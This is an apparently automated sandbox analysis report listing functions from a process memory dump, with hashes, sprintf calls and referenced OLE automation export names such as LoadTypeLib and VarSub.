Opcode ID: 537db4cbb49ecc79164c300352834e0b4bf8737e90f873d21be79cd2ab662055
Instruction ID: 19b38a3a293b09b529b3625c2c198a3e47c389c146be3ecc0ad93cd2e46086ca
Opcode Fuzzy Hash: 537db4cbb49ecc79164c300352834e0b4bf8737e90f873d21be79cd2ab662055
Instruction Fuzzy Hash: 5EE086A6E0431517E205DA54BC51AFB77989F81525F4809BFF98341140F76ED21C8AA3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC27F, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

LoadRegTypeLib, xrefs: 02BCC27F
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: LoadRegTypeLib$ord%u
API String ID: 590974362-2366677885
Opcode ID: 7a01db11aaa6022b99ec68c7c391d9d6921a97b065b1e8d7f741f2de63711e96
Instruction ID: aac1684931e9124e129addc95fe469883c308b66c44f32e20e1da74da2b8e5e8
Opcode Fuzzy Hash: 7a01db11aaa6022b99ec68c7c391d9d6921a97b065b1e8d7f741f2de63711e96
Instruction Fuzzy Hash: 4EE086A6E0431917E215DA54BC91AFF7798AF81525F4809BFF58341140F76AD21C86B3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC270, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

LoadTypeLib, xrefs: 02BCC270
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: LoadTypeLib$ord%u
API String ID: 590974362-1267866773
Opcode ID: f7c9155a70da05e6d76a6653052682df020602c877de2c672a0241c534026d11
Instruction ID: b3d034cd7b5fed765a3b9d500348f0ecb13b1155af1efa010186a494bcbfeb74
Opcode Fuzzy Hash: f7c9155a70da05e6d76a6653052682df020602c877de2c672a0241c534026d11
Instruction Fuzzy Hash: 17E086A6E0431A27E201DA58BC91AFB77C89F81525F4808BFF59381100F766E20C86B3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC261, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

CreateTypeLib, xrefs: 02BCC261
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: CreateTypeLib$ord%u
API String ID: 590974362-4293538099
Opcode ID: aadfd4201c92e0a91ef4b38c5c06913c4c632050d984821613464003e0bb44a0
Instruction ID: a3f6b7d00f81d4892e8575690f9554c7c496c4b41757889679ea722e518100b6
Opcode Fuzzy Hash: aadfd4201c92e0a91ef4b38c5c06913c4c632050d984821613464003e0bb44a0
Instruction Fuzzy Hash: B6E026A6E0431617E201CA54BC91AFB7398AFC1524F4808BEF58241100F366A20C86F3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC257, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarSub, xrefs: 02BCC257
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarSub$ord%u
API String ID: 590974362-3105383254
Opcode ID: 8530ce390e88d766996fd684463d4fa349636a1177b42d6605610c5301b02101
Instruction ID: 2dc7ab18adab5f886e1d96f9b77d062bab5c0e9b808f23fc5a41e330ab78ea48
Opcode Fuzzy Hash: 8530ce390e88d766996fd684463d4fa349636a1177b42d6605610c5301b02101
Instruction Fuzzy Hash: 79E086A6E0431917E205DA54BC51AFB77989F81525F4809BFF98341140F76ED21C8AB3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC248, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarPow, xrefs: 02BCC248
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarPow$ord%u
API String ID: 590974362-1476968729
Opcode ID: 46b5e15d04e78cb25e978df1b8d1e225a71991a311fe109c85d842b285eda4fc
Instruction ID: 02c5f57318dbf3505f694408785812267d61d5787ec672d2507b5f444dc8f1ab
Opcode Fuzzy Hash: 46b5e15d04e78cb25e978df1b8d1e225a71991a311fe109c85d842b285eda4fc
Instruction Fuzzy Hash: 74E086A6E0435A27E201DA54BC91AFB77C89F81525F4808BFF59381100F766E20C86B3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC3BF, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

ord%u, xrefs: 02BCD510
UnRegisterTypeLib, xrefs: 02BCC3BF

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: UnRegisterTypeLib$ord%u
API String ID: 590974362-3499946163
Opcode ID: fada6d3fe3f5f3630e5a98690d5eb2ce936ad7bc779c1d5d84b8952b9dc45612
Instruction ID: 185f96d6cdffe81fc89bd0cf8d35048a983bcf64997a0797e5dfecbcc417a70e
Opcode Fuzzy Hash: fada6d3fe3f5f3630e5a98690d5eb2ce936ad7bc779c1d5d84b8952b9dc45612
Instruction Fuzzy Hash: ACE086E6E0431957E205DAA4BC91AFF7798AF81525F4809BFF58341140E76AD21C86A3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC3B0, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

ord%u, xrefs: 02BCD510
VariantTimeToSystemTime, xrefs: 02BCC3B0

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VariantTimeToSystemTime$ord%u
API String ID: 590974362-50673648
Opcode ID: 72033369cb1733422dbad0bdc337146e55fb082b2dc308fa5d8655546b43032e
Instruction ID: ac0b0a75bc62a7327496e2cc56a145a28fb177e7eb51edcfd6b5aca9cab8dded
Opcode Fuzzy Hash: 72033369cb1733422dbad0bdc337146e55fb082b2dc308fa5d8655546b43032e
Instruction Fuzzy Hash: 2FE086AAE0431A27F201D654BC91AFB77C89F85525F480CBFF58381100E766D20C86B3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC3A1, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

SystemTimeToVariantTime, xrefs: 02BCC3A1
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: SystemTimeToVariantTime$ord%u
API String ID: 590974362-2780742315
Opcode ID: 2dbe205167c0a780d488870233dea187351b9dd798a4ac4b3368293033efabc7
Instruction ID: 0b4bd18ab549f974f446ad7780b07779fa775c5cd918a2a0699a582f94a860d0
Opcode Fuzzy Hash: 2dbe205167c0a780d488870233dea187351b9dd798a4ac4b3368293033efabc7
Instruction Fuzzy Hash: CFE04FA6E0431A16E201DA54BC91AEA7798AF81525F584DBEF58241100E666920C86B3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC397, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

LoadTypeLibEx, xrefs: 02BCC397
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: LoadTypeLibEx$ord%u
API String ID: 590974362-3379759339
Opcode ID: 10707620d65a08ebb5c05236f645cc7fd3507cb7ec6c8f2d8d49717a3cd7a2d7
Instruction ID: e4091481e72beab863c0dac3a2e38b8b2b8221ee5de6ec76e42a4f7338537838
Opcode Fuzzy Hash: 10707620d65a08ebb5c05236f645cc7fd3507cb7ec6c8f2d8d49717a3cd7a2d7
Instruction Fuzzy Hash: D6E086A6E0431917E205DA64BC51AFB7798AF81525F4809BFF98341140E76AD21C86B3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC388, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarDecAbs, xrefs: 02BCC388
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarDecAbs$ord%u
API String ID: 590974362-3748666886
Opcode ID: 62044b7058089b0aa59721ea8ca26b0834d3b6868b6c5abc69b2c2edaaaf68b5
Instruction ID: 581baa5ff51280cd025a5d3b0996260c68697b1b71535d3f1efe8dfc6d447b98
Opcode Fuzzy Hash: 62044b7058089b0aa59721ea8ca26b0834d3b6868b6c5abc69b2c2edaaaf68b5
Instruction Fuzzy Hash: 42E086A6E0431A67E201DA54BC91AFB77C8AF81525F4808BFF59381100E766D20C86B3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC3F1, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

ord%u, xrefs: 02BCD510
VarDecFromUI1, xrefs: 02BCC3F1

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarDecFromUI1$ord%u
API String ID: 590974362-700573829
Opcode ID: 72533b8c0237a00691f085f3b8c9a5709078d3adc47f420fb9fe6e9f1c0cbb0b
Instruction ID: 9f26c18d73043f9eca75c5dead9087c05902e2a0eb1b0322b8fc996d2aeb8148
Opcode Fuzzy Hash: 72533b8c0237a00691f085f3b8c9a5709078d3adc47f420fb9fe6e9f1c0cbb0b
Instruction Fuzzy Hash: 59E026A6E0431A17F201C654BC81AFB7388AFC1524F480CBEF58240100F366D20C86F3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC3E7, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarDecNeg, xrefs: 02BCC3E7
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarDecNeg$ord%u
API String ID: 590974362-2577227795
Opcode ID: bb7146a5d8ee9f9d49703a63a2381bd2ff39ef949328ca0808aea853863e1ec1
Instruction ID: f51bc8ea62b9caf2910b7fcef9ad8af77767531ce48494731211e61552e72fcf
Opcode Fuzzy Hash: bb7146a5d8ee9f9d49703a63a2381bd2ff39ef949328ca0808aea853863e1ec1
Instruction Fuzzy Hash: 1DE026E6E0432917E201D664BC51AFB73889F81424F4808BFF98340100FB6ED20C86A3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC3D8, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarDecInt, xrefs: 02BCC3D8
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarDecInt$ord%u
API String ID: 590974362-4137719775
Opcode ID: adc299cba0c98570ac7aacc00d3213625521696d1813d74dca00507ae849e959
Instruction ID: f22ecc508efd70b96ef69ba8c6efc609112327659833b9b7cc3f36b96c0a2b29
Opcode Fuzzy Hash: adc299cba0c98570ac7aacc00d3213625521696d1813d74dca00507ae849e959
Instruction Fuzzy Hash: 2CE086A6E0432A27E201DA54BC91AFB77CC9F81525F480CBFF58381100E766D20C86B3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC3C9, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

ord%u, xrefs: 02BCD510
VarDecFix, xrefs: 02BCC3C9

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarDecFix$ord%u
API String ID: 590974362-3833346915
Opcode ID: e637ad43dcd7f5791fe6fd8e782eab099af914b9bdbbbc2e682f182370b8bf06
Instruction ID: f52d3d75b46725aa2bb5045c362835c0e27c3719dd7de9f6b5e29d0619c15139
Opcode Fuzzy Hash: e637ad43dcd7f5791fe6fd8e782eab099af914b9bdbbbc2e682f182370b8bf06
Instruction Fuzzy Hash: 78E086A6E0431A17E201D654BC91AFF7798AFC1525F5849BEF59241240F766920C86F3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC338, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarCmp, xrefs: 02BCC338
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarCmp$ord%u
API String ID: 590974362-1254590046
Opcode ID: e8552a7ea7c018d942d6ed7daaadbf96d551f437964da3536762c3534498e279
Instruction ID: 9853ef549f5a1869c4c5311a0b42c1d7b9fb76cae37caee8c61aaca08df84eda
Opcode Fuzzy Hash: e8552a7ea7c018d942d6ed7daaadbf96d551f437964da3536762c3534498e279
Instruction Fuzzy Hash: 53E04FA6E4431A26E201D654BC91AEA77889F81525F4808BEF58281100E66A920C86B3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC329, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarRound, xrefs: 02BCC329
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarRound$ord%u
API String ID: 590974362-3571415970
Opcode ID: a5554bd4205d000c277954bbb9e8b79f254ebd99f141309bf3257ba098bbcfa3
Instruction ID: 23ecf733852d6d041af5d392b601425372a3f5c4d36c536e7c62668ae301ce22
Opcode Fuzzy Hash: a5554bd4205d000c277954bbb9e8b79f254ebd99f141309bf3257ba098bbcfa3
Instruction Fuzzy Hash: F4E086A6E4431A17E601DA54BC91AFB7798AFC1525F584DBEF58341100F776920C86F3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC31F, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarNot, xrefs: 02BCC31F
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
